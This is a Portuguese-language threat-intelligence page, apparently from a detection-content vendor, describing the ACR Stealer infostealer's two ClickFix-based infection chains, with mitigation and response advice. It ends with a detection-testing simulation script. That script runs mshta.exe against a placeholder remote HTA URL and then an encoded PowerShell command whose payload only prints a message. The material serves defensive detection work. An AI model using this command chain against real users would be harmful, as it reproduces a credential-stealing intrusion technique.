SOC Prime Bias: Alto

20 Jul 2026 06:25 UTC

ACR Stealer: Duas Cadeias de Intrusão Observadas Durante Aumento na Atividade de Ameaças

Author Photo
SOC Prime Team linkedin icon Seguir
ACR Stealer: Duas Cadeias de Intrusão Observadas Durante Aumento na Atividade de Ameaças
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

ACR Stealer é uma família de malware de roubo de informações que usa iscas de engenharia social no estilo ClickFix para alvejar ambientes corporativos. O malware opera por meio de duas cadeias de infecção principais: uma que depende de cargas maliciosas entregues via WebDAV com carregadores Python e controle comando e controle baseado em blockchain, e outra que usa MSHTA com entrega de carga útil esteganográfica. Seu objetivo principal é roubar credenciais de navegador, tokens de autenticação e documentos sensíveis.

Investigação

Especialistas do Microsoft Defender observaram um aumento na atividade entre o final de abril e meados de junho de 2026. A investigação identificou dois caminhos de execução distintos: uma campanha baseada em disco envolvendo Python e tarefas agendadas, e uma campanha sem arquivo usando MSHTA e execução de shellcode na memória. Analistas também documentaram métodos avançados de evasão, incluindo timestomping, PowerShell ofuscado e resolutores de deixas mortos apoiados em blockchain.

Mitigação

As organizações devem treinar os usuários para reconhecer prompts do ClickFix e restringir a execução de scripts não confiáveis por meio de controle de aplicativos. Reduzir a exposição a malvertising e impor filtragem web pode ajudar a interromper tentativas de acesso inicial. Reforçar os endpoints limitando a dependência de credenciais armazenadas no navegador e aplicando autenticação multifator também é essencial para reduzir o risco de roubo de credenciais.

Resposta

Se essa atividade for detectada, dispositivos afetados devem ser isolados imediatamente e todas as credenciais e tokens potencialmente comprometidos devem ser rotacionados. Os tokens de sessão devem ser revogados, e os investigadores devem revisar conexões de saída para compartilhamentos remotos suspeitos ou serviços de hospedagem de imagem. O EDR em modo de bloqueio deve ser usado para conter a ameaça e remover artefatos maliciosos de forma eficiente.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque de Pré-Voo de Telemetria e Linha de Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstractos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa do Ataque & Comandos: O adversário visa um usuário com um falso “erro do navegador” (ClickFix). Uma vez que o usuário copia e cola o comando em um terminal, cmd.exe é invocado. O comando instrui mshta.exe a conectar-se a um URL remoto para buscar um script malicioso. Para evadir ainda mais a detecção simples de strings, o script usa powershell.exe com um comando codificado (-Enc) para baixar e executar o malware ACR Stealer na memória, contornando a varredura tradicional baseada em arquivos.

  • Script de Teste de Regressão:

    # Simulação da Cadeia ACR Stealer ClickFix
    # Etapa 1: Simule o wrapper cmd.exe
    # Etapa 2: Invoque mshta.exe com um URL
    # Etapa 3: Seguido por um comando PowerShell codificado
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Comandos de Limpeza:

    # Nenhum arquivo persistente é criado nesta simulação, mas certifique-se de que não fiquem processos órfãos
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue